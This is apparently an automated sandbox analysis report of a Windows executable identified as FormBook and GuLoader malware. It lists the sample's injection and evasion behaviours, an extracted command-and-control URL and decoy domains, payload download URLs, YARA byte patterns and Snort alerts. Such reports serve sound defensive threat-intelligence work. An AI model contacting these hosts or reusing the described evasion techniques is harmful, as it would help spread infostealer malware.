Edit tour

Windows Analysis Report
hi38VYWujz.exe

Overview

General Information

Sample Name:	hi38VYWujz.exe
Analysis ID:	1267197
MD5:	63abea7feba39deb21bcbefd7926f00e
SHA1:	cd616dbf86a53beca504e72e9096ed45903794f4
SHA256:	b028ced984ab94ba551b890e2b55645509a1bfd4f2970b592ada728de261a379
Infos:

Detection

FormBook, GuLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for submitted file

Yara detected FormBook

Malicious sample detected (through community Yara rule)

System process connects to network (likely due to code injection or exploit)

Antivirus detection for URL or domain

Yara detected GuLoader

Snort IDS alert for network traffic

Sample uses process hollowing technique

Maps a DLL or memory area into another process

Tries to detect Any.run

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Performs DNS queries to domains with low reputation

Modifies the prolog of user mode functions (user mode inline hooks)

Queues an APC in another process (thread injection)

Modifies the context of a thread in another process (thread injection)

C2 URLs / IPs found in malware configuration

Uses 32bit PE files

Yara signature match

Drops certificate files (DER)

May sleep (evasive loops) to hinder dynamic analysis

Contains functionality to shutdown / reboot the system

Uses code obfuscation techniques (call, push, ret)

Internet Provider seen in connection with other malware

Detected potential crypto function

Found potential string decryption / allocating functions

Sample execution stops while process was sleeping (likely an evasion)

Contains functionality to call native functions

Contains functionality to dynamically determine API calls

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Contains functionality for execution timing, often used to detect debuggers

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Sample file is different than original file name gathered from version info

Drops PE files

Tries to load missing DLLs

Contains functionality to read the PEB

Uses a known web browser user agent for HTTP communication

Checks if the current process is being debugged

PE / OLE file has an invalid certificate

Found large amount of non-executed APIs

Creates a process in suspended mode (likely to inject code)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality for read data from the clipboard

Classification

Process Tree

System is w10x64native

hi38VYWujz.exe (PID: 6396 cmdline: C:\Users\user\Desktop\hi38VYWujz.exe MD5: 63ABEA7FEBA39DEB21BCBEFD7926F00E)

hi38VYWujz.exe (PID: 7828 cmdline: C:\Users\user\Desktop\hi38VYWujz.exe MD5: 63ABEA7FEBA39DEB21BCBEFD7926F00E)

explorer.exe (PID: 5528 cmdline: C:\Windows\Explorer.EXE MD5: 5EA66FF5AE5612F921BC9DA23BAC95F7)

cscript.exe (PID: 7820 cmdline: C:\Windows\SysWOW64\cscript.exe MD5: 13783FF4A2B614D7FBD58F5EEBDEDEF6)

cmd.exe (PID: 5228 cmdline: /c del "C:\Users\user\Desktop\hi38VYWujz.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7484 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://asec.ahnlab.com/en/32149/ https://blog.360totalsecurity.com/en/bayworld-event-cyber-attack-against-foreign-trade-industry/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Name	Description	Attribution	Blogpost URLs	Link
CloudEyE, GuLoader	CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.	No Attribution	https://0x00sec.org/t/analyzing-modern-malware-techniques-part-3/18943 https://any.run/cybersecurity-blog/deobfuscating-guloader/ https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/ https://blog.malwarebytes.com/scams/2020/08/sba-phishing-scams-from-malware-to-advanced-social-engineering/ https://blog.morphisec.com/guloader-the-rat-downloader	https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.fetch-a-estudia-y-trabaja.info/be53/"], "decoy": ["monsterdonut.net", "shutterpilot.co.uk", "deangelojamess.com", "mecxon.online", "eaglewallet.tech", "withlovepty.africa", "akgrouptr.com", "carrentalcost.site", "cancercachexiastudy.com", "educationmall.africa", "kisaliste.com", "labarlonecode.com", "icolut.xyz", "excuu.club", "gota-africana.top", "letmeoutbook.com", "duniyartech.africa", "freightbyu.com", "laanonimalibreria.com", "atable-maroc.com", "keyofcaiyla.com", "mofangyan.net", "avtodortpass.ru", "kash-fitness.com", "belledvip.com", "influencermarks.com", "jobbapadistans.se", "craftykraftcorner.com", "geofryj.africa", "egetirun.top", "jsmrl.com", "crossdressersespana.com", "oceanscope.africa", "gespesa.com", "2004256.com", "bigplusmedicals.com", "jakesgaragellc.com", "arenasportluck.site", "akseki.net", "amonhu.com", "53e.link", "higai-kaifuku.com", "enjoythearoma.com", "digiunlock.com", "hjd1fe.com", "emilykeefemusic.com", "largesxiaothose.com", "arctiquevarare.com", "1wisas.top", "bumdabs.com", "hz-op.com", "immortal-civilization.com", "cleaning-services-82507.com", "curveywomenkit.com", "efefequable.buzz", "ghazihaqim.com", "cristianlealojeda.com", "josephajaogo.africa", "artificialgrasswichita.com", "5821934.com", "mebssa.net", "efefsilky.buzz", "nisekopiraestate.net", "embhajeflexiveis.com"]}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
0000000D.00000002.49454963074.0000000014854000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_772cc62d	unknown	unknown	0xa22:$a2: pass 0xa28:$a3: email 0xa2f:$a4: login 0xa36:$a5: signin 0xa47:$a6: persistent 0xc1a:$r1: C:\Users\user\AppData\Roaming\8M23OT5C\8M2log.ini
0000000E.00000002.49413298437.00000000031E0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000E.00000002.49413298437.00000000031E0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000E.00000002.49413298437.00000000031E0000.00000004.00000800.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18839:$sqlite3step: 68 34 1C 7B E1 0x1894c:$sqlite3step: 68 34 1C 7B E1 0x18868:$sqlite3text: 68 38 2A 90 C5 0x1898d:$sqlite3text: 68 38 2A 90 C5 0x1887b:$sqlite3blob: 68 53 D8 7F 8C 0x189a3:$sqlite3blob: 68 53 D8 7F 8C
0000000E.00000002.49413298437.00000000031E0000.00000004.00000800.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000E.00000002.49413298437.00000000031E0000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbb0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
0000000B.00000002.45278753504.0000000036750000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000B.00000002.45278753504.0000000036750000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000B.00000002.45278753504.0000000036750000.00000040.10000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18839:$sqlite3step: 68 34 1C 7B E1 0x1894c:$sqlite3step: 68 34 1C 7B E1 0x18868:$sqlite3text: 68 38 2A 90 C5 0x1898d:$sqlite3text: 68 38 2A 90 C5 0x1887b:$sqlite3blob: 68 53 D8 7F 8C 0x189a3:$sqlite3blob: 68 53 D8 7F 8C
0000000B.00000002.45278753504.0000000036750000.00000040.10000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000B.00000002.45278753504.0000000036750000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbb0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
0000000E.00000002.49412276825.0000000002B30000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000E.00000002.49412276825.0000000002B30000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000E.00000002.49412276825.0000000002B30000.00000040.80000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18839:$sqlite3step: 68 34 1C 7B E1 0x1894c:$sqlite3step: 68 34 1C 7B E1 0x18868:$sqlite3text: 68 38 2A 90 C5 0x1898d:$sqlite3text: 68 38 2A 90 C5 0x1887b:$sqlite3blob: 68 53 D8 7F 8C 0x189a3:$sqlite3blob: 68 53 D8 7F 8C
0000000E.00000002.49412276825.0000000002B30000.00000040.80000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000E.00000002.49412276825.0000000002B30000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbb0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
0000000E.00000002.49413018523.00000000031B0000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000E.00000002.49413018523.00000000031B0000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000E.00000002.49413018523.00000000031B0000.00000040.10000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18839:$sqlite3step: 68 34 1C 7B E1 0x1894c:$sqlite3step: 68 34 1C 7B E1 0x18868:$sqlite3text: 68 38 2A 90 C5 0x1898d:$sqlite3text: 68 38 2A 90 C5 0x1887b:$sqlite3blob: 68 53 D8 7F 8C 0x189a3:$sqlite3blob: 68 53 D8 7F 8C
0000000E.00000002.49413018523.00000000031B0000.00000040.10000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000E.00000002.49413018523.00000000031B0000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbb0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
0000000B.00000002.45164539590.00000000000A0000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000B.00000002.45164539590.00000000000A0000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000B.00000002.45164539590.00000000000A0000.00000040.10000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18839:$sqlite3step: 68 34 1C 7B E1 0x1894c:$sqlite3step: 68 34 1C 7B E1 0x18868:$sqlite3text: 68 38 2A 90 C5 0x1898d:$sqlite3text: 68 38 2A 90 C5 0x1887b:$sqlite3blob: 68 53 D8 7F 8C 0x189a3:$sqlite3blob: 68 53 D8 7F 8C
0000000B.00000002.45164539590.00000000000A0000.00000040.10000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000B.00000002.45164539590.00000000000A0000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbb0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000006.00000002.45136338191.000000000637B000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
Process Memory Space: hi38VYWujz.exe PID: 7828	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x1470d4:$a1: 3C 30 50 4F 53 54 74 09 40
Click to see the 23 entries

Snort Signatures

ET TROJAN Generic .bin download from Dotted Quad - Source IP: 192.168.11.20 - Destination IP: 34.138.169.8

Timestamp:	192.168.11.2034.138.169.850281802018752 07/05/23-14:06:25.128312
SID:	2018752
Source Port:	50281
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.11.20 - Destination IP: 172.67.140.128

Timestamp:	192.168.11.20172.67.140.12850292802031412 07/05/23-14:09:08.747292
SID:	2031412
Source Port:	50292
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET DNS Query to a *.top domain - Likely Hostile - Source IP: 192.168.11.20 - Destination IP: 1.1.1.1

Timestamp:	192.168.11.201.1.1.157075532023883 07/05/23-14:10:11.745985
SID:	2023883
Source Port:	57075
Destination Port:	53
Protocol:	UDP
Classtype:	Potentially Bad Traffic

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.11.20 - Destination IP: 160.124.149.176

Timestamp:	192.168.11.20160.124.149.17650295802031412 07/05/23-14:10:31.285472
SID:	2031412
Source Port:	50295
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.11.20 - Destination IP: 217.70.184.50

Timestamp:	192.168.11.20217.70.184.5050287802031412 07/05/23-14:07:26.793879
SID:	2031412
Source Port:	50287
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.11.20 - Destination IP: 103.169.142.0

Timestamp:	192.168.11.20103.169.142.050289802031412 07/05/23-14:07:47.341708
SID:	2031412
Source Port:	50289
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET DNS Query to a *.top domain - Likely Hostile - Source IP: 192.168.11.20 - Destination IP: 1.1.1.1

Timestamp:	192.168.11.201.1.1.153849532023883 07/05/23-14:11:32.290600
SID:	2023883
Source Port:	53849
Destination Port:	53
Protocol:	UDP
Classtype:	Potentially Bad Traffic

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.11.20 - Destination IP: 104.17.158.1

Timestamp:	192.168.11.20104.17.158.150291802031412 07/05/23-14:08:48.505600
SID:	2031412
Source Port:	50291
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 0000000E.00000002.49413298437.00000000031E0000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: FormBook {"C2 list": ["www.fetch-a-estudia-y-trabaja.info/be53/"], "decoy": ["monsterdonut.net", "shutterpilot.co.uk", "deangelojamess.com", "mecxon.online", "eaglewallet.tech", "withlovepty.africa", "akgrouptr.com", "carrentalcost.site", "cancercachexiastudy.com", "educationmall.africa", "kisaliste.com", "labarlonecode.com", "icolut.xyz", "excuu.club", "gota-africana.top", "letmeoutbook.com", "duniyartech.africa", "freightbyu.com", "laanonimalibreria.com", "atable-maroc.com", "keyofcaiyla.com", "mofangyan.net", "avtodortpass.ru", "kash-fitness.com", "belledvip.com", "influencermarks.com", "jobbapadistans.se", "craftykraftcorner.com", "geofryj.africa", "egetirun.top", "jsmrl.com", "crossdressersespana.com", "oceanscope.africa", "gespesa.com", "2004256.com", "bigplusmedicals.com", "jakesgaragellc.com", "arenasportluck.site", "akseki.net", "amonhu.com", "53e.link", "higai-kaifuku.com", "enjoythearoma.com", "digiunlock.com", "hjd1fe.com", "emilykeefemusic.com", "largesxiaothose.com", "arctiquevarare.com", "1wisas.top", "bumdabs.com", "hz-op.com", "immortal-civilization.com", "cleaning-services-82507.com", "curveywomenkit.com", "efefequable.buzz", "ghazihaqim.com", "cristianlealojeda.com", "josephajaogo.africa", "artificialgrasswichita.com", "5821934.com", "mebssa.net", "efefsilky.buzz", "nisekopiraestate.net", "embhajeflexiveis.com"]}

Multi AV Scanner detection for submitted file

Source: hi38VYWujz.exe	Virustotal: Detection: 57%			Perma Link
Source: hi38VYWujz.exe	ReversingLabs: Detection: 50%

Yara detected FormBook

Source: Yara match	File source: 0000000E.00000002.49413298437.00000000031E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.45278753504.0000000036750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.49412276825.0000000002B30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.49413018523.00000000031B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.45164539590.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Antivirus detection for URL or domain

Source: http://www.icolut.xyz/be53/?oT5=s1julRGmed5yUPqy1/u/CkIYofLXefI1rcsRJX7fFh3jFZdFBAK63iIEYWpG9dFdYT7A&v0Dd=aPFdKLwPWjPXZR-p	Avira URL Cloud: Label: phishing
Source: http://www.1wisas.top/be53/?oT5=h5pbAFevEiRk+Avdv7HqEwAnW0lU2xxIsSfcH8MPtJpxQdX8NQy8CxMG+zlahwfzy/4y&v0Dd=aPFdKLwPWjPXZR-p	Avira URL Cloud: Label: phishing
Source: http://34.138.169.8/wp-content/themes/seotheme/IpOVHkNfbEqHd29.bin	Avira URL Cloud: Label: malware
Source: http://34.138.169.8/wp-content/themes/seotheme/IpOVHkNfbEqHd29.binO	Avira URL Cloud: Label: malware
Source: http://34.138.169.8/wp-content/themes/seotheme/IpOVHkNfbEqHd29.bind(#	Avira URL Cloud: Label: malware
Source: http://34.138.169.8/wp-content/themes/seotheme/IpOVHkNfbEqHd29.binQ._	Avira URL Cloud: Label: malware
Source: http://34.138.169.8/wp-content/themes/seotheme/IpOVHkNfbEqHd29.binL/K	Avira URL Cloud: Label: malware

Source: hi38VYWujz.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: C:\Users\user\Desktop\hi38VYWujz.exe

Registry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Crc32

Jump to behavior

Source: hi38VYWujz.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: cscript.pdbUGP source: hi38VYWujz.exe, 0000000B.00000003.45163393069.000000000693F000.00000004.00000020.00020000.00000000.sdmp, hi38VYWujz.exe, 0000000B.00000002.45164816357.00000000000D0000.00000040.10000000.00040000.00000000.sdmp, hi38VYWujz.exe, 0000000B.00000003.45162607030.000000000691D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mshtml.pdb source: hi38VYWujz.exe, 0000000B.00000001.44920374076.0000000000649000.00000020.00000001.01000000.00000007.sdmp
Source:	Binary string: wntdll.pdbUGP source: hi38VYWujz.exe, 0000000B.00000002.45280294767.0000000036BDD000.00000040.00001000.00020000.00000000.sdmp, hi38VYWujz.exe, 0000000B.00000003.45080936588.0000000036908000.00000004.00000020.00020000.00000000.sdmp, hi38VYWujz.exe, 0000000B.00000003.45076039412.000000003675A000.00000004.00000020.00020000.00000000.sdmp, hi38VYWujz.exe, 0000000B.00000002.45280294767.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: hi38VYWujz.exe, hi38VYWujz.exe, 0000000B.00000002.45280294767.0000000036BDD000.00000040.00001000.00020000.00000000.sdmp, hi38VYWujz.exe, 0000000B.00000003.45080936588.0000000036908000.00000004.00000020.00020000.00000000.sdmp, hi38VYWujz.exe, 0000000B.00000003.45076039412.000000003675A000.00000004.00000020.00020000.00000000.sdmp, hi38VYWujz.exe, 0000000B.00000002.45280294767.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: mshtml.pdbUGP source: hi38VYWujz.exe, 0000000B.00000001.44920374076.0000000000649000.00000020.00000001.01000000.00000007.sdmp
Source:	Binary string: cscript.pdb source: hi38VYWujz.exe, 0000000B.00000003.45163393069.000000000693F000.00000004.00000020.00020000.00000000.sdmp, hi38VYWujz.exe, 0000000B.00000002.45164816357.00000000000D0000.00000040.10000000.00040000.00000000.sdmp, hi38VYWujz.exe, 0000000B.00000003.45162607030.000000000691D000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 6_2_0040596D GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	6_2_0040596D
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 6_2_004065A2 FindFirstFileW,FindClose,	6_2_004065A2
Source: C:\Users\user\Desktop\hi38VYWujz.exe	Code function: 6_2_00402862 FindFirstFileW,	6_2_00402862

Networking

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 35.208.230.52 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 76.223.105.230 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 156.251.235.194 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 217.160.0.102 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 103.169.142.0 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 172.67.140.128 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 217.70.184.50 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 190.115.19.43 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 104.17.158.1 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 162.241.203.15 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 156.246.142.1 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 160.124.149.176 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 198.54.117.216 80	Jump to behavior

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2018752 ET TROJAN Generic .bin download from Dotted Quad 192.168.11.20:50281 -> 34.138.169.8:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:50287 -> 217.70.184.50:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:50289 -> 103.169.142.0:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:50291 -> 104.17.158.1:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:50292 -> 172.67.140.128:80
Source: Traffic	Snort IDS: 2023883 ET DNS Query to a *.top domain - Likely Hostile 192.168.11.20:57075 -> 1.1.1.1:53
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:50295 -> 160.124.149.176:80
Source: Traffic	Snort IDS: 2023883 ET DNS Query to a *.top domain - Likely Hostile 192.168.11.20:53849 -> 1.1.1.1:53

Performs DNS queries to domains with low reputation

Source:

DNS query: www.icolut.xyz

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: www.fetch-a-estudia-y-trabaja.info/be53/

Source: Joe Sandbox View	ASN Name: GOOGLE-2US GOOGLE-2US
Source: Joe Sandbox View	ASN Name: AMAZON-02US AMAZON-02US

